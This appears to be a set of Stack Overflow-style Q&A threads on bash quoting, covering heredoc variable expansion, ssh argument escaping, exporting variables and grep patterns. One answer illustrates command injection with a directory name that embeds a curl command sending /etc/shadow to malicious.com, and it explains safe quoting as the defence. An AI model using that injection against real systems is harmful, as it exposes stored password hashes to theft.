When I execute this, I get just empty lines as output
# /bin/bash <<- EOF
while read a
do
echo $a
done < /etc/fstab
EOF
If I copy the content of here-document into file and execute it, everything works as expected (I get content of /etc/fstab file).
Could anyone explain why?
UPDATE:
Answering a question about why would I need to pass here-doc to bash this way, here is what I'm actually trying to do:
ssh user#host /bin/bash <<- EOF
while read f; do
sed -i -e "s/$OLD_VAL/$NEW_VAL/g" $f
done < /tmp/list_of_files
EOF
Sed is complaining that $f is not set
In case someone bumps into this, here is a version that works:
# /bin/bash <<- EOF
while read a
do
echo \$a
done < /etc/fstab
EOF
The variable a is not defined in the parent bash script. It will be substituted with empty value before the here-document will be passed to a child bash. To avoid substitution a $-sign should be escaped with "\".
You dont need here document here. If you were trying a script you could do:
#!/bin/bash
while read a
do
echo "$a"
done < /etc/fstab
I do not have enough reputation here to add comments, so I am forced to answer instead.
First, you have multiple levels of shell going on. In your initial example, the syntax for your HERE doc was incorrect, but your edited update was correct. The <<- will remove one leading tab character (but not spaces) from each line of text until your EOF delimiter (which could have been named anything). Using << without the '-' would expect each line of the HEREdoc to start in column 0.
Next, you are using ssh getting your shell from a remote host. This also implies that your /tmp/list_of_files will also exist on the remote machine. This also means any local shell meta-character should be escaped to ensure it is passed to the program/location where you actually want it expanded.
I do not believe a HEREdoc is necessary, when you can pass a complete semicolon separated one-liner to ssh. This may also afford you some flexibility to let your local shell do some expansion before variables are passed to ssh or your remote shell.
OLD=' '
NEW=$'\t'
ssh -q user#host "for filename in \$(</tmp/list_of_files); do gsed -i.\$(date %s) -e 's/'$OLD'/'$NEW'/g' \$filename; done"
Let's not forget the -i is an in-place edit, not a flag to ignore the upper/lower case of our regex match. I like to create backups of my files any time I edit/change them so I have a history if/when anything breaks later.
Related
When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, are passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${#// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${#/...//...}" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$#"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which printf %q quoted content
# to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$#"
}
cmd_str=$(posix_quote "$#")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${#// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, probably an example is in order. Create a tst.sh with above line and make executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid#server ls /tmp
And if you're in a different country and really wanted some non-english character, that's maintained by surrounding with the $"...", aka locale-specific.
I am trying to create and use variables inside heredoc like this,
#!bin/bash
sudo su - postgres <<EOF
IP="XYZ"
echo "$IP"
EOF
This doesn't work right and I get a blank line as echo.
But if I use quotes around EOF like this,
#!bin/bash
sudo su - postgres <<"EOF"
IP="XYZ"
echo "$IP"
EOF
It works. Can someone please explain this? According to what I read in man the behaviour should be opposite.
The shell evaluates the unquoted here document and performs variable interpolation before passing it to the command (in your case, sudo). Because IP is not a defined variable in the parent shell, it gets expanded to an empty string.
With quotes, you prevent variable interpolation by the parent shell, and so the shell run by sudo sees and expands the variable.
I used this command in my Bash Shell:
printf $VAR1 >> `printf $VAR2`
and it normally worked. But when I write this into the script file and run it in Shell, it does not work. File "script.sh" contains this:
#!/bin/bash
printf $VAR1 >> `printf $VAR2`
and the output in Shell is:
script.sh: line2: `printf $VAR2`: ambiguous redirect
I don´t know, how is this possible, because the command is absolutely the same. And of course, I run the script on the same system and in the same Shell window.
Thank you for your help.
There are 3 points worth addressing here:
Shell variables vs. environment variables:
Scripts (unless invoked with . / source) run in a child process that only sees the parent [shell]'s environment variables, not its regular shell variables.
This is what likely happened in the OP's case: $VAR1 and $VAR2 existed as regular shell variables, but not environment variables, so script script.sh didn't see them.
Therefore, for a child process to see a parent shell's shell variables, the parent must export them first, as a result of which they (also) become environment variables: export VAR1=... VAR2=...
Bash's error messages relating to output redirection (>, >>):
If the filename argument to a an output redirection is an - unquoted command substitution (`...`, or its modern equivalent, $(...)) - i.e., the output from a command - Bash reports error ambiguous redirect in the following cases:
The command output has embedded whitespace, i.e., contains more than one word.
The command output is empty, which is what likely happened in the OP's case.
As an aside: In this case, the error message's wording is unfortunate, because there's nothing ambiguous about a missing filename - it simply cannot work, because files need names.
It is generally advisable to double-quote command substitutions (e.g., >> "$(...)") and also variable references (e.g., "$VAR2"): this will allow you to return filenames with embedded whitespace, and, should the output be unexpectedly empty, you'll get the (slightly) more meaningful error message No such file or directory.
Not double-quoting a variable reference or command substitution subjects its value / to so-called shell expansions: further, often unintended interpretation by the shell.
The wisdom of using a command substitution to generate a filename:
Leaving aside that printf $VAR2 is a fragile way to print the value of variable $VAR2 in general (the robust form again involves double-quoting: printf "$VAR2", or, even more robustly, to rule out inadvertent interpretation of escape sequences in the variable value, printf %s "$VAR2"), there is no good reason to employ a command substitution to begin with if all that's needed is a variable's value:
>> "$VAR2" is enough to robustly specify the value of variable $VAR2 as the target filename.
I tried this on my Mac (10.11.1) in a terminal window and it worked fine.
Are you sure your default shell is bash?
echo $SHELL
Did you use EXPORT to set your shell vars?
$ export VAR1="UselessData"
$ export VAR2="FileHoldingUselessData"
$ ./script.sh
$ cat FileHoldingUselessData
UselessData$
However.... echo I think does a better job since with printf the output terminates with the first space so....
$ cat script.sh
#!/bin/bash
echo $VAR1 >> `printf $VAR2`
$ ./script.sh
$ cat FileHoldingUselessData
Some Useless Data
Which leads me to believe you might want to just use echo instead of printf all together..
#!/bin/bash
echo $VAR1 >> `echo $VAR2`
I don't usually work in bash but grep could be a really fast solution in this case. I have read a lot of questions on grep and variable assignment in bash yet I do not see the error. I have tried several flavours of double quotes around $pattern, used `...`` or $(...) but nothing worked.
So here's what I try to do:
I have two files. The first contains several names. Each of them I want to use as a pattern for grep in order to search them in another file. Therefore I loop through the lines of the first file and assign the name to the variable pattern.
This step works as the variable is printed out properly.
But somehow grep does not recognize/interpret the variable. When I substitute "$pattern" with an actual name everything is fine as well. Therefore I don't think the variable assignment has a problem but the interpretation of "$pattern" as the string it should represent.
Any help is greatly appreciated!
#!/bin/bash
while IFS='' read -r line || [[ -n $line ]]; do
a=( $line )
pattern="${a[2]}"
echo "Text read from file: $pattern"
var=$(grep "$pattern" 9606.protein.aliases.v10.txt)
echo "Matched Line in Alias is: $var"
done < "$1"
> bash match_Uniprot_StringDB.sh ~/Chromatin_Computation/.../KDM.protein.tb
output:
Text read from file: "UBE2B"
Matched Line in Alias is:
Text read from file: "UTY"
Matched Line in Alias is:
EDIT
The solution drvtiny suggested works. It is necessary to get rid of the double quotes to match the string. Adding the following lines makes the script work.
pattern="${pattern#\"}"
pattern="${pattern%\"}"
Please, look at "-f FILE" option in man grep.
I advise that this option do exactly what you need without any bash loops or such other "hacks" :)
And yes, according to the output of your code, you read pattern including double quotes literally. In other words, you read from file ~/Chromatin_Computation/.../KDM.protein.tb this string:
"UBE2B"
But not
UBE2B
as you probably expect.
Maybe you need to remove double quotes on the boundaries of your $pattern?
Try to do this after reading pattern:
pattern=${pattern#\"}
pattern=${pattern%\"}
I’m trying to build a command string based to pass in a “-e” flag and another variable into a another base script being call as a subroutine and have run into a strange problem; I’m losing the “-e” portion of the string when I pass it into the subroutine. I create a couple example which illustrate the issue, any help?
This works as you would expect:
$echo "-e $HOSTNAME"
-e ops-wfm
This does NOT; we lose the “-e” because it is interpreted as a special qualifier.
$myFlag="-e $HOSTNAME"; echo $myFlag
ops-wfm
Adding the “\” escape charactor doesn’t work either, I get the correct string with the "\" in front:
$myFlag="\-e $HOSTNAME"; echo $myFlag
\-e ops-wfm
How can I prevent -e being swallowed?
Use double-quotes:
$ myFlag="-e $HOSTNAME"; echo "${myFlag}"
-e myhost.local
I use ${var} rather than $var out of habit as it means that I can add characters after the variable without the shell interpreting them as part of the variable name.
echo may not be the best example here. Most Unix commands will accept -- to mark no more switches.
$ var='-e .bashrc' ; ls -l -- "${var}"
ls: -e .bashrc: No such file or directory
Well, you could put your variable in quotes:
echo "$myFlag"
...making it equivalent to your first example, which, as you say, works just fine.